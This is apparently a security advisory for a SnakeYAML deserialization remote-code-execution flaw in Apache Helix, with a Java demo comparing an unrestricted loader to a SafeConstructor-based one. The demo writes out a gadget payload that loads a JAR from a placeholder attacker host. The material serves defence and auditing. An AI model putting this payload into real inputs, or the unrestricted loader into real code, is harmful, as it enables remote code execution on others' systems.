Severity: 9.8 Critical (CVSS 3.1 qualitative rating for a 9.0-10.0 score)
CVSS 3.1 vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
  Attack Vector: Network
  Attack Complexity: Low
  Privileges Required: None
  User Interaction: None
  Scope: Unchanged
  Confidentiality Impact: High
  Integrity Impact: High
  Availability Impact: High
EPSS score: 0.002 (0.2% probability of exploitation, Low)
EPSS percentile: 55.3%
org.apache.helix:helix-core and org.apache.helix:helix-rest are vulnerable to Remote Code Execution (RCE). Both artifacts parse YAML with a SnakeYAML loader that resolves arbitrary global (!!) tags to Java classes and instantiates them. An attacker who controls the YAML input can have the parser construct a java.net.URLClassLoader pointing at a JAR on an attacker-chosen URL and then pass that loader to the javax.script.ScriptEngineManager constructor. ScriptEngineManager uses the supplied ClassLoader to discover and initialize script-engine providers, so the attacker's JAR is fetched and its code executed. The result is remote code execution caused by this unrestricted deserialization flaw.
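The following Java program is an added illustration, not code from the Apache Helix project or the linked commits. It places the unrestricted SnakeYAML loader next to one built on SafeConstructor, which only constructs standard YAML types (maps, lists, scalars) and rejects the ScriptEngineManager/URLClassLoader tag chain before any class is instantiated. The configuration document and the payload are constructed for the example; the payload URL (attacker.invalid) is a placeholder, and the payload is only ever handed to the hardened loader, so nothing is fetched. It assumes org.yaml:snakeyaml 1.33 or 2.x on the classpath.

```java
import java.util.Map;

import org.yaml.snakeyaml.LoaderOptions;
import org.yaml.snakeyaml.Yaml;
import org.yaml.snakeyaml.constructor.SafeConstructor;
import org.yaml.snakeyaml.error.YAMLException;

/**
 * Added example, not Helix code: an unrestricted SnakeYAML loader beside a
 * SafeConstructor-based one, fed the same benign config and the gadget payload
 * shape described in the advisory.
 */
public class SnakeYamlGadgetDemo {

    // Constructed, benign configuration document: what a YAML loader should accept.
    static final String CONFIG = String.join("\n",
        "cluster: demo",
        "instances:",
        "  - localhost_12918",
        "  - localhost_12919",
        "");

    // Constructed payload in the shape the advisory describes: a ScriptEngineManager
    // whose ClassLoader is a URLClassLoader over an attacker-chosen JAR URL.
    // The host is a hypothetical placeholder; this string is never given to the
    // unrestricted loader below, so no network access happens.
    static final String PAYLOAD =
        "!!javax.script.ScriptEngineManager ["
      + "!!java.net.URLClassLoader [[!!java.net.URL [\"http://attacker.invalid/payload.jar\"]]]]";

    /** Vulnerable pattern: the default constructor maps any !!global tag to a Java class. */
    static Object loadUnrestricted(String document) {
        return new Yaml().load(document);
    }

    /** Hardened pattern: SafeConstructor builds only maps, lists and scalars. */
    static Object loadSafe(String document) {
        return new Yaml(new SafeConstructor(new LoaderOptions())).load(document);
    }

    public static void main(String[] args) {
        // Both loaders handle ordinary configuration identically.
        Map<?, ?> a = (Map<?, ?>) loadUnrestricted(CONFIG);
        Map<?, ?> b = (Map<?, ?>) loadSafe(CONFIG);
        System.out.println("unrestricted: " + a);
        System.out.println("safe:         " + b);

        // The gadget chain is rejected when the tag is resolved, before any class
        // is instantiated and before a URLClassLoader could contact the remote host.
        try {
            loadSafe(PAYLOAD);
            System.out.println("unexpected: payload was constructed");
        } catch (YAMLException e) {
            System.out.println("rejected by SafeConstructor: " + e.getMessage());
        }
        // loadUnrestricted(PAYLOAD) on SnakeYAML 1.x would instantiate the chain and
        // fetch the JAR, which is why it is deliberately not called here.
    }
}
```

The exception type differs by SnakeYAML version (a ConstructorException from SafeConstructor on 1.x, a ComposerException from the default tag inspector on 2.x), but both extend YAMLException and both fire before any Java object from the payload exists. When auditing for this flaw, search for `new Yaml()` with no constructor argument and for `Yaml.load`/`loadAs` calls reachable from untrusted input.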
github.com/advisories/GHSA-jhcr-hph9-g7wm
github.com/apache/helix/commit/09d210fa29b18f3b4de8d32f2369dc2b31f71f43
github.com/apache/helix/commit/eabfda26b18c72f4f945dcaac5756665c6a2cdac
github.com/apache/helix/pull/2398
github.com/apache/helix/pull/2399
lists.apache.org/thread/zyqxhv0lc2z9w3tgr8ttrdy2zfh5jvc4